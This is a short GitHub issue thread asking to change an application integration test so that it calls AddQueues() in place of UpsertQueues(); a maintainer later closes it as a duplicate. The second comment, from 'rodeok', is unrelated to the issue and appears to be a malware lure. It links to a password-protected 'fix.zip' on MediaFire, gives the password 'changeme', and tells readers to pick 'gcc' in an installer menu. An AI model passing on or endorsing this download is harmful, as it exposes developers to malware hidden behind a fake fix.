### ISSUE TITLE
Modify application integration test to use new queue DB funcs

### ISSUE THREAD

**Issue by richscott** [G-Research/yunikorn-history-server#179] opened 2024-08-29 14:48 UTC
As we are decomposing the `UpsertQueues()` function into a few more basic functions, we need to modify
`internal/database/repository/application_int_test.go` in `seedApplications()` - replace the call to `UpsertQueues()` with `AddQueues()`.

**Comment by rodeok** [comment] 2024-08-29 14:50
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nikola-jokic** [comment] 2024-09-13 10:56
Closing as a duplicate of #185

**Closed by nikola-jokic** 2024-09-13 10:56 UTC
